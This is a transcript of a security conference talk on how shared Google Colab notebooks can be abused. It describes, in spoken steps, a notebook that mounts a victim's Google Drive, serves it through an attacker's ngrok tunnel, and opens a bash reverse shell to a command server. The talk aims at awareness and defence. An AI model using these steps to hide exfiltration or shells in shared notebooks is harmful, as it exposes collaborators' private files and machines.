[00:02.930 --> 00:09.450] Let me... I will introduce Antonio. I'd like to welcome to the stage Antonio Piazza, [00:09.450 --> 00:16.310] who's going to present Careful Who You Collab With, Abusing Google Collaboratory. Antonio [00:16.310 --> 00:21.730] Piazza, hailing from Cleveland, Ohio, USA, is a Purple Team Leader and Offensive Security [00:21.730 --> 00:26.990] Engineer at NVIDIA. Following his stint as a U.S. Army Human Intelligence Collector, [00:26.990 --> 00:34.490] you and I should talk after your talk. He worked as a Defense Contractor Operator on an NSA Red [00:34.490 --> 00:41.450] Team, so he's intimately familiar with spies, hacking, and nerd stuff. Antonio is passionate [00:41.450 --> 00:47.590] about all things related to macOS security and hacking, thus spends his days researching macOS [00:47.590 --> 00:54.030] internals and security, as well as writing free open-source Red Team tools for use in the defense [00:54.030 --> 00:59.550] against the dark arts. Oh, that's... I... that sounds cool. As of late, he has been planning [00:59.550 --> 01:05.810] to implement machine learning into Red Teaming with his NVIDIA colleagues. So, please welcome [01:05.810 --> 01:36.010] Antonio. Sorry, I have to give you access, I guess. Oh, I see. Sorry. I was looking for your [01:36.010 --> 01:47.240] handle. There we go. Okay, you have access. All right. Make sure to pick up a microphone [01:47.240 --> 01:58.720] to get megaphone access. Just point your pointer at one of the microphones, and it'll change from [01:58.900 --> 02:10.660] a circle to a funny-looking icon, and then left-click to pick it up. Is that right? Left-click, [02:18.840 --> 02:26.060] I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay, yeah, [02:30.780 --> 02:34.680] I can learn how to use these controls. That'd be wonderful. [02:35.760 --> 02:42.400] Okay, thanks everyone. I really appreciate you coming and listening to this. Can everyone hear [02:42.400 --> 02:53.140] me okay before I start going on? This is my first formal doing anything in VR, so hopefully it goes [02:53.140 --> 02:59.400] well. I'm going to be looking at my slides a lot, so yell at me if something happens. [03:01.160 --> 03:07.080] So anyway, when I started this research, I was toying around with the idea of creating a startup [03:07.740 --> 03:14.540] that would provide a service to artists that would allow them to gain inspiration through AI. [03:14.540 --> 03:19.460] That was kind of the premise of the startup idea I had. And I wanted to start with music, [03:19.460 --> 03:28.420] because that's where my passion is. The idea was that a musician who needs inspiration for writing [03:28.420 --> 03:34.580] their next song could submit some samples of their music, or of songs from which they wish [03:34.580 --> 03:42.600] to emulate, or they gain inspiration from. And the AI would then throw together a bunch of [03:42.600 --> 03:50.540] riffs similar to, but not the same, as the style that the user submitted. I started using [03:50.540 --> 03:57.100] Google Collaborator and getting involved in the AI art music community, including [03:57.100 --> 04:04.460] the Databots Discord channel, and reading white papers concerning sample RNN. [04:04.940 --> 04:10.860] Not having a great GPU on my own computer at the time, and they were super expensive [04:10.860 --> 04:18.760] and hard to get. Not anymore, thanks to me working at NVIDIA. Some AI researchers in the community [04:18.760 --> 04:24.920] directed me to Google Collaboratory. So I started playing with it and found it to be a great tool [04:24.920 --> 04:29.560] for AI collaboration, and you get a free GPU, which is really nice. [04:30.180 --> 04:35.600] So this research didn't start with anything to do with security. Next slide, please. [04:36.980 --> 04:43.920] Then a researcher in the Databots Discord, who was involved in another project called OpenAI [04:43.920 --> 04:53.800] Jukebox. This platform allows the user to train the AI by feeding it a song or whatever, [04:53.800 --> 05:00.500] and the AI will give you, in return, a song where the artist sings the lyrics he provides. So I was [05:00.500 --> 05:06.140] playing around and trying to get Elvis to sing the lyrics of Sir Michelot's Baby Got Back [05:06.140 --> 05:11.440] in the style of Suspicious Minds. Next slide, please. [05:13.140 --> 05:19.020] And a researcher, Brockaloo, from the AI Jukebox research project helped me out by tweaking some [05:19.020 --> 05:25.220] of the configurations in my Google Cloud file, which he shared with me via this Discord message. [05:25.420 --> 05:31.720] I opened the file in Colab as normal, and again, as normal, I began the process of mounting my [05:31.720 --> 05:38.960] Google Drive in Colab. And this is when it hit me. When I mounted my Google Drive, this prompt [05:38.960 --> 05:43.440] came up on the screen, and it said, I don't know if you can read it, but it says, this notebook is [05:43.440 --> 05:49.100] requesting access to your Google Drive files. Your access to Google Drive will permit code executed [05:49.100 --> 05:55.600] in the notebook to modify files in your Google Drive. Make sure to review notebook code prior [05:55.600 --> 06:01.840] to allowing the access. And that's where security research began for this. So next slide, please. [06:02.960 --> 06:07.920] And again, the talk is titled, Careful Who You Colab With Abusing Google Collaboratory. [06:07.920 --> 06:15.540] Next slide, please. And I am Antonio Piazza. I go by Antman1P on the Twitters. [06:15.560 --> 06:22.220] I'm an offensive security engineer. Most of my security experience is strictly red teaming. [06:22.340 --> 06:29.420] I've worked at Zoom, Box, the Cleveland Clinic, on an NSA red team as a defense contractor. [06:29.420 --> 06:34.440] And now I am the purple team leader at NVIDIA on the threat operations team. [06:34.960 --> 06:41.500] And that ODIN logo down there, some stickers. If you're here at DEF CON, I'm here. I'll be [06:41.500 --> 06:45.360] down in the AI village after this talk, and I'll hand them out if you want some. [06:46.480 --> 06:52.160] I'm also in my final course of the Master's of Science in Information Security Engineering [06:52.160 --> 06:58.280] Program at SANS Technology Institute. I'm a father of five, a husband, and again, I love music. [06:58.280 --> 06:59.740] Next slide, please. [07:02.500 --> 07:06.500] So the agenda here, we're just going to be pretty brief. We're going to discuss [07:06.500 --> 07:10.980] what Google Collaboratory is, because I'm sure some of you don't know. Some of you might be [07:10.980 --> 07:15.880] familiar. We're going to talk about how we can abuse Google Collab, and then we're just going to [07:15.880 --> 07:26.360] kind of conclude. Next slide, please. So what is Google Collaboratory? I'll let Google define it, [07:26.360 --> 07:32.540] because I think they best describe it in detail. Collaboratory, or Collab for short, is a product [07:32.540 --> 07:38.840] from Google Research. Collab allows anybody to write and execute arbitrary Python code through [07:38.840 --> 07:45.780] the browser, and is especially well-suited to machine learning, data analysts, and education. [07:45.980 --> 07:52.900] More technically, Collab is a hosted Jupyter Notebook service that requires no setup to use, [07:52.900 --> 07:59.660] while providing access free of charge to computing resources, including GPUs. [07:59.700 --> 08:04.320] Collab resources are not guaranteed and not unlimited, and the usage limits sometimes [08:04.320 --> 08:11.360] fluctuate. So you actually, if you're interested in having reliable access and better resources, [08:11.360 --> 08:16.260] you could purchase Collab Pro, which is, I think, about $50 a month. [08:16.800 --> 08:23.100] Um, what is the difference between Jupyter and Collab? Jupyter is an open source project in [08:23.100 --> 08:30.580] which Collab is based. Collab allows you to use and share Jupyter Notebooks with others without [08:30.580 --> 08:35.980] having to download and install or run anything. So that's the example I gave of, you know, [08:35.980 --> 08:44.760] Broccoli sharing a Collab file with me. He was actually sharing a Jupyter Notebook file. [08:44.760 --> 08:46.380] Next slide, please. [08:47.520 --> 08:54.720] How is Collab normally used? You can write your own notebooks, which are stored in your Google [08:54.720 --> 09:00.540] account, Google Drive. Basically, you write Python code in a Jupyter Notebook cell, [09:00.540 --> 09:07.960] and you execute the cells by pushing the execute button. When you open or start a notebook, [09:07.960 --> 09:13.700] you connect it to a Collab runtime, and that's where you get your GPU and other resources. [09:14.760 --> 09:20.520] Spin up and start running, and you also may connect your notebook to your Google Drive. [09:20.520 --> 09:27.200] So in the slide here, the picture, I got arrows from a Jupyter cell, and you can see the little [09:27.200 --> 09:32.460] black play button, which is how you run a cell, and then on the upper right-hand corner, [09:32.460 --> 09:38.860] just showing you your resources usage for your runtime. Next slide, please. [09:40.600 --> 09:47.660] How is Collab normally used? Kind of continuing, you can import Python libraries, just as you [09:47.660 --> 09:54.600] could normally do in Python. You can install dependencies with pip, and you can clone Git [09:54.600 --> 10:05.540] repos all into these Jupyter Notebook cells. Next slide, please. You also have a Collab terminal. [10:05.540 --> 10:11.960] Once connected to the Collab runtime, you have a terminal that you can use to run shell commands, [10:11.960 --> 10:17.620] and once connected to Drive, you can navigate the connected Google Drive file system. [10:19.080 --> 10:23.360] A question, where is my code executed? What happens to my execution [10:23.360 --> 10:27.800] state if I close the browser window? The code is executed in a virtual machine [10:28.740 --> 10:32.140] private to your account. Virtual machines are deleted, [10:32.140 --> 10:37.440] when idle for a while, and have a minimum lifetime enforced by the Collab service. I don't, [10:37.440 --> 10:41.220] I haven't sat and tried to figure out what that time is, but that's something I'll probably do [10:41.220 --> 10:46.920] in the future. It seems to last a while, as long as you're active. Next slide, please. [10:50.970 --> 10:57.050] Finally, I want to touch on system aliases. So Jupyter has a number of system aliases, or [10:57.050 --> 11:05.690] basically command shortcuts, to common operations such as ls, cat, ps, kill, so just your normal, [11:05.690 --> 11:15.090] you know, Nix built-in commands. You can execute these from the Jupyter Notebook cell by adding the [11:15.930 --> 11:22.450] bang, the exclamation point before the command, so bang ls will run the ls command. [11:23.110 --> 11:24.810] Next slide, please. [11:26.450 --> 11:34.550] All right, so how is this abusable? Let's recap. If I'm an adversary and I share a Collab file with [11:34.550 --> 11:40.510] someone, a Jupyter Notebook with someone, if they choose to use my file, they must mount their [11:40.510 --> 11:47.250] Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent [11:47.250 --> 11:53.850] them. The adversary could potentially access all of the contents of a victim's Google Drive and [11:53.850 --> 12:00.650] exfiltrate anything they choose at that point. The adversary could edit the victim's Collab [12:00.650 --> 12:09.230] files to create backdoors that might still exploit other users that the victim collaborates with. [12:09.810 --> 12:16.170] Can have a reverse shell on a Collab virtual machine in the runtime we're talking about. [12:17.630 --> 12:26.630] Is there a possibility to do a VM escape? Maybe. All this could be as simple as sending a phishing [12:26.630 --> 12:34.010] email with a link to a malicious Collab file or sending a link to a malicious Collab file in an [12:34.010 --> 12:39.510] AI community Discord server, just like the ones I hang out in and kind of the way that Broccoli [12:39.510 --> 12:46.870] shared the file. I got to say, the one he shared with me was not malicious, by the way. I scared [12:46.870 --> 12:50.410] him when he saw these slides. He thought, like, oh, my God, did I send you something malicious? [12:50.410 --> 12:57.470] I'm like, no, no, no, that just got my brain working like an adversary. So you can hide [12:58.010 --> 13:02.770] malicious code in Jupyter shells. You can hide it in Git repos since you can clone Git repos [13:02.770 --> 13:07.470] into a Jupyter notebook. So there's a number of ways. Next slide, please. [13:11.490 --> 13:16.170] So for a clear understanding of what an attacker might have access to, [13:16.170 --> 13:20.990] they successfully gain access to a victim's Collab runtime or their Google Drive. [13:20.990 --> 13:28.290] Here are the permissions that one grants when mounting a Google Drive for a Collab session. [13:29.450 --> 13:33.230] If you're having a hard time seeing these, I can read them real quick. But it's like see, [13:33.230 --> 13:39.170] edit, create, delete all of your Google Drive files. View the photos, videos, albums in your [13:39.170 --> 13:46.450] Google Photos. Retrieve mobile client configuration and experimentation. View [13:46.450 --> 13:53.370] Google people information, such as profiles and contacts or basically all the contacts you have [13:53.370 --> 14:01.070] in your Google account, including your phone or your Gmail. See, edit, create, and delete [14:01.070 --> 14:05.190] any of your Google Drive documents. Next slide, please. [14:08.430 --> 14:14.670] To see what an attacker might do, we can take a look at MITRE ATLAS. [14:14.770 --> 14:21.200] So ATLAS stands for Adversarial Threat Landscape for Artificial Intelligence Systems. [14:21.930 --> 14:27.930] It's a knowledge base of adversary tactics, techniques, and case studies in learning systems [14:28.720 --> 14:34.630] based on real-world observations, demonstrations from machine learning red teams and security [14:34.630 --> 14:41.670] groups, and the state of what's possible from academic research. ATLAS is basically modified [14:41.670 --> 14:47.370] after the MITRE ATT&CK framework, which people are commonly more familiar with. And its tactics [14:47.370 --> 14:54.470] and techniques are complementary to those in MITRE ATT&CK. So how can an attacker do this? [14:54.470 --> 15:00.550] Well, for initial access, we discussed phishing the AI community or ML research community via [15:00.550 --> 15:08.330] email or Discord servers. MITRE ATLAS has a machine learning supply chain compromise technique [15:08.330 --> 15:14.830] under the initial access tactic. That might make sense. So maybe we can add a sub-technique there [15:14.830 --> 15:23.610] for Jupyter Notebook sharing. Also, user execution under the execution tactic. So an attacker might [15:23.610 --> 15:29.990] hide a backdoor in a Jupyter cell or maybe hide a backdoor in a Git repo that the notebook clones. [15:30.610 --> 15:32.330] Next slide, please. [15:34.630 --> 15:38.690] This is an example here of hiding malicious code in Jupyter Notebook cells. [15:38.890 --> 15:45.850] Here is code on the left that will give an adversary access to the victim's Google Drive. [15:45.910 --> 15:52.430] While an adversary shared this notebook, a victim might easily recognize that this is not [15:52.890 --> 16:01.330] AI ML. This one on the left is just all for an adversary getting access to Google Drive. [16:01.350 --> 16:05.550] But some of the AI and ML notebooks are quite large. As you can see on the right, [16:05.550 --> 16:09.710] that's not even the whole thing. And I zoomed out as far as possible to take that screenshot. [16:10.230 --> 16:16.930] An adversary might be able to hide the malicious bits within normal machine learning code. [16:16.930 --> 16:22.910] So the image on the right is just one small piece from a collab project with an AI community [16:22.910 --> 16:29.030] member that an AI community member shared with me. Nothing malicious in there, just [16:29.030 --> 16:35.010] an example of how much code there is that an adversary could hide malicious cells and [16:35.010 --> 16:37.990] malicious code in. Next slide, please. [16:40.170 --> 16:48.930] Okay, so this is the example of the malicious code by the numbers, right? So imagine you receive [16:49.610 --> 16:57.090] a link to a collab file and you open it. If you run all of this, you will give the sender access [16:57.090 --> 17:05.410] to all your files via Google Drive, via ngrok. So the first thing you do in the code is for the [17:05.410 --> 17:09.850] victim is going to mount their Google Drive. And again, this is normal behavior for all collab [17:09.850 --> 17:17.830] files, right? Like in order to kind of persist and store the data created from running one of [17:17.830 --> 17:22.710] these, you have to store it somewhere. And when you're in the cloud, you're going to mount or [17:22.710 --> 17:30.610] you're going to store it. The next step, you're going to wget ngrok tarball and untar it. [17:31.330 --> 17:39.530] The third step is you're going to register your attacker ngrok API key. So it's a bit dangerous [17:40.450 --> 17:47.690] for an attacker to, I guess, hard code API key, but an attacker can always change it when they're [17:47.690 --> 17:55.610] done pillaging, or if they're unsuccessful with the attack. So it's not too bad. Step four is [17:55.610 --> 18:04.710] start a Python server on a specified port. So like 9999 in this case, and then run ngrok [18:04.710 --> 18:21.130] on the same port in step five. Next slide, please. So this is a video demo. I don't know, [18:21.130 --> 18:29.470] were you able to run the videos from this presentation? I don't know if that problem [18:29.470 --> 18:41.430] was solved or... I don't know if anybody can hear me. It should be running right now. Oh, [18:41.430 --> 18:47.770] it's running. Okay. I can't see it, but I'll just go ahead. So the victim, again, will run the cloud [18:47.770 --> 18:54.550] file, mount their drive. So you can see, but off screen, I'm picking up, or picking my Gmail [18:54.550 --> 19:01.530] account and allowing the drive access, as I showed in the image earlier. And now I could navigate [19:01.530 --> 19:09.370] the file system on the left, on the left, if I wanted. So installing Python requests, don't [19:09.370 --> 19:17.290] really need it here, but I want to show how you can use PIP if needed. I do a PWD to show the [19:17.290 --> 19:25.490] or the correct location of the Google Drive file system. And then I curl ifconfig.me to show [19:25.490 --> 19:35.030] my Cloud VM IP address. Wget to download ngrok, tar to untar ngrok, run ngrok, [19:35.030 --> 19:43.610] config to add my API key, run the Python server to serve the Google Drive root directory, [19:43.610 --> 19:54.990] run ngrok. And then on the attacker side, the attacker goes to the ngrok agents. [19:56.210 --> 20:02.150] Is there a way to, like, tilt my view so I can look up and see the slides? I'm, like, looking down. [20:03.210 --> 20:05.570] Yes, move your mouse forward. [20:09.830 --> 20:13.730] Oh, there it is. Okay. Oh, did something go wrong? [20:15.130 --> 20:24.450] Oh, no. No, no, you're okay. I think I'll just kind of... So on the attacker side, the attacker [20:24.450 --> 20:32.670] goes to ngrok agents. And you might have saw there the IP address of the agent matched what I got [20:32.670 --> 20:43.070] from the curling of ifconfig.me. And then we're in. So we can navigate the Google Drive system, [20:43.070 --> 20:49.430] download whatever we want from the victim. So that what you're seeing there is kind of like [20:49.430 --> 21:00.450] an upper browser, in-browser representation of the victim's Google Drive. Next slide, please. [21:04.110 --> 21:12.790] Okay, so that was the example of being able to get into a victim's Google Drive. And this one is a [21:12.790 --> 21:21.630] reverse shell example. It's really, it's two simple steps for this one. So basically, [21:21.630 --> 21:30.450] mount the victim Google Drive, and then do a bash TCP reverse shell to the adversary C2 [21:30.450 --> 21:35.450] server IP address. And I didn't show a video for this because it's just so simple. [21:35.450 --> 21:43.630] But you get the idea of what a reverse shell is going to look like. Next slide, please. [21:44.670 --> 21:51.850] Okay, so knowing all this, you know, what is the problem? So quickly, GPUs are a little harder to [21:51.850 --> 22:01.830] find. Supply chain issues. They're pretty expensive. Where Collab is free and even Pro [22:02.210 --> 22:10.290] is cheap. AI and ML researchers are starting to use Collab more, especially education sectors [22:10.290 --> 22:16.210] and universities are using something similar like these cloud-based Jupyter Notebooks, [22:17.270 --> 22:22.150] runtime environments. And researchers are collaborating and sharing, right? This is [22:22.390 --> 22:28.350] a pretty exciting time where we're able to, you know, someone like me, who's not super [22:28.350 --> 22:34.570] schooled in AI and ML can get their start because there's just so many cool, you know, [22:34.570 --> 22:38.710] so much cool research going on there and people are willing to share it and get to learn how to [22:38.710 --> 22:46.990] do all the crazy cool AI stuff. Where I think the problem comes in is that most AI and ML [22:46.990 --> 22:53.150] researchers and developers are not security experts, right? So it's kind of like at the [22:53.150 --> 22:59.130] beginning of software engineering, like nobody's really thinking about security. It took a while [22:59.130 --> 23:05.330] for that to change and we're kind of back like at square one with that, I think, with AI and ML [23:05.330 --> 23:11.590] researchers. The good news is security has been, you know, around for a while and we kind of saw [23:11.590 --> 23:17.710] the mistakes that were being made at the beginning, you know, with software engineering. So hopefully [23:17.710 --> 23:25.250] we can quickly jump in and start, you know, securing things in the machine learning and AI [23:26.250 --> 23:34.550] sector. And finally, phishing is easy, right? I've been on a lot of red teams and, [23:34.550 --> 23:40.550] you know, it's a numbers game. If I send out 100 phish, I know I'm going to get at least one, [23:40.550 --> 23:45.710] as long as they all make it through, you know, your email filtering. That's never really been [23:45.770 --> 23:57.630] a problem. So, and it's scary. How can we fix it? Well, ML researchers and people who are [23:57.630 --> 24:05.050] collaborating should read the code someone shares with them. Let that Google Drive mount warning [24:05.050 --> 24:10.930] remind you every time, like, oh, before I mount this, let me look through and make sure this code [24:10.930 --> 24:17.330] is good. And it's what I was expecting and nothing weird in there. And I know that's difficult, [24:17.330 --> 24:27.850] because again, in that example, that could be in one of these, you know, notebooks, it might be [24:27.850 --> 24:32.930] difficult to find those needle and haystack. And especially if the researcher doesn't know what to [24:32.930 --> 24:40.250] look for. So, you know, that's one thing I think, as security experts, we should probably start [24:41.770 --> 24:48.830] educating machine learning and AI researchers in what bad looks like, right? So, this is me, [24:48.830 --> 24:52.490] I'm hopefully getting something out, you know, to the security community. And hopefully, [24:52.490 --> 24:57.830] this will spread from the security community into the ML research and AI community and [24:58.370 --> 25:05.910] start using your expertise to educate those folks on what bad looks like. So then they can [25:05.910 --> 25:13.110] search for that in their notebooks. Maybe develop a code sharing plugin, you know, [25:13.110 --> 25:19.510] in Google Drive. Maybe Google can do that or the open source community can do that. [25:19.810 --> 25:28.570] Next slide, please. With that, thanks again. This is really cool doing something for the first time [25:28.570 --> 25:36.830] in VR. Hopefully, it went smoothly for everyone else. And again, I hope you got something out of [25:36.830 --> 25:42.330] this. And please feel free to ask any questions. I know I'm probably out of time here, but hopefully [25:42.330 --> 25:43.990] I can answer some questions. [25:48.450 --> 25:53.890] Do you think this problem should be fixed by Google or do you think it should be up to the user [25:54.630 --> 26:00.490] basically to kind of watch themselves to make sure they don't download any malicious code? [26:01.750 --> 26:09.950] You know, it's funny because I've heard that question before. Basically, is this a [26:09.950 --> 26:16.750] problem that the users need to solve? Well, absolutely. But, you know, if you think about it, [26:18.690 --> 26:22.730] security education has been trying to push the responsibility on the user, which [26:22.730 --> 26:30.030] ultimately it is in the end. But is that working? Are users listening? [26:30.030 --> 26:38.310] And especially if you're securing an enterprise or a corporate network or [26:38.310 --> 26:46.410] something, we would hope all the users would do diligence, but it just never turns out that [26:46.410 --> 26:54.010] way, right? I would love if every person would be super diligent when opening an email and not [26:54.010 --> 27:00.130] clicking on a link, right? But it just never happens. So, yeah, I mean, I think it's always [27:00.130 --> 27:08.050] an end user responsibility. But ultimately, I think, you know, we have to do our part as well [27:08.050 --> 27:16.190] as, you know, security experts. Should Google do anything? In my opinion, they should have more [27:16.190 --> 27:25.150] than just that warning. But, you know, I've submitted several things to Google. I don't know. [27:25.150 --> 27:31.230] I don't try to pick on Google, but I use Google a lot. So I end up finding things. I've submitted [27:31.230 --> 27:35.450] things and, you know, they're just like, oh, that works as normal. And I'm like, that doesn't seem [27:35.450 --> 27:42.370] like great security practice. But no, that's the response. So I don't have an expectation that [27:42.370 --> 27:48.350] Google will do anything. I wish they would. But, you know, I think ultimately, we're going to have [27:48.350 --> 27:57.730] to rely on the open source community to develop some plugins or, again, help educate people. [28:04.760 --> 28:08.700] Next slide, please. I actually have one more slide. Sometimes I get... it's not really a [28:08.700 --> 28:18.080] question, but people want to hear the maybe got back thing with Elvis. I can play it if you want. [28:31.870 --> 28:35.430] Well, I don't know if that went as smoothly as I hoped, but [28:37.310 --> 28:46.690] it's a work in progress. But it gets pretty crazy when the end, the AI starts singing in [28:46.690 --> 28:55.490] some alien language. It reminds me of this show, Devs, when they had that background [28:55.490 --> 29:02.450] weird noise of the quantum computer speaking. It's kind of spooky. But anyway, any other questions? [29:05.030 --> 29:07.850] All right. Well, thanks a lot. Again, I really appreciate it. [29:11.250 --> 29:16.210] Thank you, Antonio, for your presentation. I have to be careful, I guess, who we collab [29:16.210 --> 29:20.330] with from here on out. I never thought of that Jupyter Notebooks being used in that way. That's [29:20.330 --> 29:21.090] quite clever.